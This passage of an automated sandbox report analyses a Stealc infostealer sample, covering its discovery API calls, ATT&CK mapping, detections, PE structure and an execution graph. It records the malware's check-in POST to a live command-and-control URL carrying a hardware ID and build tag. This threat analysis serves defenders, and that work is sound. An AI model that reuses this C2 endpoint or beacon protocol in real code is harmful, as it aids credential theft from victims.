              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00722D60
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00722B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00722B60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00722A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00722A40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00722C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00722C10

              Stealing of Sensitive Information

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000003.2044462951.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2085798410.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 2804, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000003.2044462951.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2085798410.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 2804, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter              		1
              Create Account              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		33
              Virtualization/Sandbox Evasion              		LSASS Memory641
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools              		Security Account Manager33
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS13
              Process Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing              		DCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc Filesystem324
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe50%VirustotalBrowse
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://185.215.113.206/c4becf79229cb002.php/Ct100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.phpel100%Avira URL Cloudmalware
              http://185.215.113.206/Vt100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.phpDt100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.phpql100%Avira URL Cloudmalware
              http://185.215.113.206/1t100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.206/c4becf79229cb002.phpfalse
                		high
                http://185.215.113.206/false
                  		high
                  185.215.113.206/c4becf79229cb002.phpfalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/c4becf79229cb002.phpelfile.exe, 00000000.00000002.2085798410.0000000001119000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://185.215.113.206/c4becf79229cb002.php/Ctfile.exe, 00000000.00000002.2085798410.0000000001119000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://185.215.113.206file.exe, 00000000.00000002.2085798410.00000000010BE000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://185.215.113.206/c4becf79229cb002.phpqlfile.exe, 00000000.00000002.2085798410.0000000001119000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://185.215.113.206/c4becf79229cb002.phpDtfile.exe, 00000000.00000002.2085798410.0000000001119000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://185.215.113.206/Vtfile.exe, 00000000.00000002.2085798410.0000000001119000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://185.215.113.206/1tfile.exe, 00000000.00000002.2085798410.0000000001119000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://185.215.113.206/5file.exe, 00000000.00000002.2085798410.00000000010BE000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        185.215.113.206
                        		unknownPortugal
                        		206894WHOLESALECONNECTIONSNLtrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1562847
                        Start date and time:2024-11-26 06:45:12 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 3m 0s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:2
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@1/0@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 80%
                        • Number of executed functions: 19
                        • Number of non-executed functions: 123
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        185.215.113.206file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, DarkTortilla, LummaC Stealer, Stealc, VidarBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php

                        Domains

                        No context

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousLummaC StealerBrowse
                        • 185.215.113.16
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, DarkTortilla, LummaC Stealer, Stealc, VidarBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                        • 185.215.113.206

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        No created / dropped files found

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.946197241704331
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.exe
                        File size:1'813'504 bytes
                        MD5:9c3907317b9374403b30537d305a9608
                        SHA1:cc0a6c6a0902debac4da3bad9b3eded80a503a6e
                        SHA256:8f0d52b51a86a71a362bd071e2ee687c7921e0c4f32a0e96fd0ba4c9a3f568e0
                        SHA512:a8779fad2d12d9d5ea7afd49ce8ec7a051818f96933668715a7587bc881e3f85178ca199a0a4b307bb2d459122253390fae83058297202e0dbe281bb808121ec
                        SSDEEP:49152:6zO1CVR+Mva8iZ4j7YUQ/bLrHOKUlSCgX8NgiF:6K1CVwMv5vebHHO5lSC+8qiF
                        TLSH:B185335D0E0A1D55C8BAB0B1AED5D6D723B8199F104D0BAB5E7FB8F6800BC9385D70E8
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

                        File Icon

                        Icon Hash:00928e8e8686b000

                        Static PE Info

                        General

                        Entrypoint:0xa97000
                        Entrypoint Section:.taggant
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                        Entrypoint Preview

                        Instruction
                        jmp 00007FABF0CE480Ah
                        jp 00007FABF0CE4821h
                        add byte ptr [eax], al
                        jmp 00007FABF0CE6805h
                        add byte ptr [0000000Ah], al
                        add byte ptr [eax], al
                        add byte ptr [eax], dh
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add al, byte ptr [eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [0000000Ah], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax+eax*4], cl
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        push es
                        or al, byte ptr [eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al

                        Rich Headers

                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x2b0.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        0x10000x2490000x16200038b1e3bdf4d17cb6b002f5b65bc7552unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0x24a0000x2b00x2006b128f6b737b31c4817b32d14316d400False0.796875data6.075277624843152IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        0x24c0000x2a90000x2002b5c67d51c81ed2d1a47070fe4cf2416unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        bdmyinmd0x4f50000x1a10000x1a0e008572a0be72a9ab65b39abfb5a4d32c26False0.9949113333958021data7.954445428928977IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        opbnouzp0x6960000x10000x40068293240909a87fcf122189362771692False0.7431640625data5.998858203632482IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .taggant0x6970000x30000x22008fba5ae08ab3c92c6788a7a34bdcb0c8False0.054457720588235295DOS executable (COM)0.7998543289782488IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                        Resources

                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_MANIFEST0x695ae80x256ASCII text, with CRLF line terminators0.5100334448160535

                        Imports

                        DLLImport
                        kernel32.dlllstrcpy

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-11-26T06:46:09.099061+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.20680TCP

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Nov 26, 2024 06:46:07.134424925 CET4970480192.168.2.5185.215.113.206
                        Nov 26, 2024 06:46:07.254602909 CET8049704185.215.113.206192.168.2.5
                        Nov 26, 2024 06:46:07.254709005 CET4970480192.168.2.5185.215.113.206
                        Nov 26, 2024 06:46:07.254863024 CET4970480192.168.2.5185.215.113.206
                        Nov 26, 2024 06:46:07.374815941 CET8049704185.215.113.206192.168.2.5
                        Nov 26, 2024 06:46:08.630518913 CET8049704185.215.113.206192.168.2.5
                        Nov 26, 2024 06:46:08.630637884 CET4970480192.168.2.5185.215.113.206
                        Nov 26, 2024 06:46:08.647948980 CET4970480192.168.2.5185.215.113.206
                        Nov 26, 2024 06:46:08.767959118 CET8049704185.215.113.206192.168.2.5
                        Nov 26, 2024 06:46:09.098990917 CET8049704185.215.113.206192.168.2.5
                        Nov 26, 2024 06:46:09.099061012 CET4970480192.168.2.5185.215.113.206
                        Nov 26, 2024 06:46:12.193181992 CET4970480192.168.2.5185.215.113.206

                        HTTP Request Dependency Graph

                        • 185.215.113.206

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.549704185.215.113.206802804C:\Users\user\Desktop\file.exe
                        TimestampBytes transferredDirectionData
                        Nov 26, 2024 06:46:07.254863024 CET90OUTGET / HTTP/1.1
                        Host: 185.215.113.206
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Nov 26, 2024 06:46:08.630518913 CET203INHTTP/1.1 200 OK
                        Date: Tue, 26 Nov 2024 05:46:08 GMT
                        Server: Apache/2.4.41 (Ubuntu)
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Nov 26, 2024 06:46:08.647948980 CET411OUTPOST /c4becf79229cb002.php HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----DHIEBAAKJDHIECAAFHCA
                        Host: 185.215.113.206
                        Content-Length: 209
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Data Raw: 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 36 46 46 35 31 44 33 36 37 43 30 35 38 34 39 32 38 30 38 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 2d 2d 0d 0a
                        Data Ascii: ------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="hwid"C6FF51D367C058492808------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="build"mars------DHIEBAAKJDHIECAAFHCA--
                        Nov 26, 2024 06:46:09.098990917 CET210INHTTP/1.1 200 OK
                        Date: Tue, 26 Nov 2024 05:46:08 GMT
                        Server: Apache/2.4.41 (Ubuntu)
                        Content-Length: 8
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 59 6d 78 76 59 32 73 3d
                        Data Ascii: YmxvY2s=


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        System Behavior

                        General

                        Target ID:0
                        Start time:00:46:03
                        Start date:26/11/2024
                        Path:C:\Users\user\Desktop\file.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\file.exe"
                        Imagebase:0x700000
                        File size:1'813'504 bytes
                        MD5 hash:9C3907317B9374403B30537D305A9608
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2044462951.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2085798410.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:4.9%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:16.2%
                          Total number of Nodes:1410
                          Total number of Limit Nodes:28
                          execution_graph 26007 721bf0 26059 702a90 26007->26059 26011 721c03 26012 721c29 lstrcpy 26011->26012 26013 721c35 26011->26013 26012->26013 26014 721c65 ExitProcess 26013->26014 26015 721c6d GetSystemInfo 26013->26015 26016 721c85 26015->26016 26017 721c7d ExitProcess 26015->26017 26160 701030 GetCurrentProcess VirtualAllocExNuma 26016->26160 26022 721ca2 26023 721cb8 26022->26023 26024 721cb0 ExitProcess 26022->26024 26172 722ad0 GetProcessHeap RtlAllocateHeap GetComputerNameA 26023->26172 26026 721ce7 lstrlen 26031 721cff 26026->26031 26027 721cbd 26027->26026 26381 722a40 GetProcessHeap RtlAllocateHeap GetUserNameA 26027->26381 26029 721cd1 26029->26026 26033 721ce0 ExitProcess 26029->26033 26030 721d23 lstrlen 26032 721d39 26030->26032 26031->26030 26034 721d13 lstrcpy lstrcat 26031->26034 26035 721d5a 26032->26035 26036 721d46 lstrcpy lstrcat 26032->26036 26034->26030 26037 722ad0 3 API calls 26035->26037 26036->26035 26038 721d5f lstrlen 26037->26038 26040 721d74 26038->26040 26039 721d9a lstrlen 26041 721db0 26039->26041 26040->26039 26042 721d87 lstrcpy lstrcat 26040->26042 26043 721dce 26041->26043 26045 721dba lstrcpy lstrcat 26041->26045 26042->26039 26174 722a40 GetProcessHeap RtlAllocateHeap GetUserNameA 26043->26174 26045->26043 26046 721dd3 lstrlen 26047 721de7 26046->26047 26048 721df7 lstrcpy lstrcat 26047->26048 26049 721e0a 26047->26049 26048->26049 26050 721e28 lstrcpy 26049->26050 26051 721e30 26049->26051 26050->26051 26052 721e56 OpenEventA 26051->26052 26053 721e68 CloseHandle Sleep OpenEventA 26052->26053 26054 721e8c CreateEventA 26052->26054 26053->26053 26053->26054 26175 721b20 GetSystemTime 26054->26175 26058 721ea5 CloseHandle ExitProcess 26382 704a60 26059->26382 26061 702aa1 26062 704a60 2 API calls 26061->26062 26063 702ab7 26062->26063 26064 704a60 2 API calls 26063->26064 26065 702acd 26064->26065 26066 704a60 2 API calls 26065->26066 26067 702ae3 26066->26067 26068 704a60 2 API calls 26067->26068 26069 702af9 26068->26069 26070 704a60 2 API calls 26069->26070 26071 702b0f 26070->26071 26072 704a60 2 API calls 26071->26072 26073 702b28 26072->26073 26074 704a60 2 API calls 26073->26074 26075 702b3e 26074->26075 26076 704a60 2 API calls 26075->26076 26077 702b54 26076->26077 26078 704a60 2 API calls 26077->26078 26079 702b6a 26078->26079 26080 704a60 2 API calls 26079->26080 26081 702b80 26080->26081 26082 704a60 2 API calls 26081->26082 26083 702b96 26082->26083 26084 704a60 2 API calls 26083->26084 26085 702baf 26084->26085 26086 704a60 2 API calls 26085->26086 26087 702bc5 26086->26087 26088 704a60 2 API calls 26087->26088 26089 702bdb 26088->26089 26090 704a60 2 API calls 26089->26090 26091 702bf1 26090->26091 26092 704a60 2 API calls 26091->26092 26093 702c07 26092->26093 26094 704a60 2 API calls 26093->26094 26095 702c1d 26094->26095 26096 704a60 2 API calls 26095->26096 26097 702c36 26096->26097 26098 704a60 2 API calls 26097->26098 26099 702c4c 26098->26099 26100 704a60 2 API calls 26099->26100 26101 702c62 26100->26101 26102 704a60 2 API calls 26101->26102 26103 702c78 26102->26103 26104 704a60 2 API calls 26103->26104 26105 702c8e 26104->26105 26106 704a60 2 API calls 26105->26106 26107 702ca4 26106->26107 26108 704a60 2 API calls 26107->26108 26109 702cbd 26108->26109 26110 704a60 2 API calls 26109->26110 26111 702cd3 26110->26111 26112 704a60 2 API calls 26111->26112 26113 702ce9 26112->26113 26114 704a60 2 API calls 26113->26114 26115 702cff 26114->26115 26116 704a60 2 API calls 26115->26116 26117 702d15 26116->26117 26118 704a60 2 API calls 26117->26118 26119 702d2b 26118->26119 26120 704a60 2 API calls 26119->26120 26121 702d44 26120->26121 26122 704a60 2 API calls 26121->26122 26123 702d5a 26122->26123 26124 704a60 2 API calls 26123->26124 26125 702d70 26124->26125 26126 704a60 2 API calls 26125->26126 26127 702d86 26126->26127 26128 704a60 2 API calls 26127->26128 26129 702d9c 26128->26129 26130 704a60 2 API calls 26129->26130 26131 702db2 26130->26131 26132 704a60 2 API calls 26131->26132 26133 702dcb 26132->26133 26134 704a60 2 API calls 26133->26134 26135 702de1 26134->26135 26136 704a60 2 API calls 26135->26136 26137 702df7 26136->26137 26138 704a60 2 API calls 26137->26138 26139 702e0d 26138->26139 26140 704a60 2 API calls 26139->26140 26141 702e23 26140->26141 26142 704a60 2 API calls 26141->26142 26143 702e39 26142->26143 26144 704a60 2 API calls 26143->26144 26145 702e52 26144->26145 26146 726390 GetPEB 26145->26146 26147 7265c3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 26146->26147 26150 7263c3 26146->26150 26148 726625 GetProcAddress 26147->26148 26149 726638 26147->26149 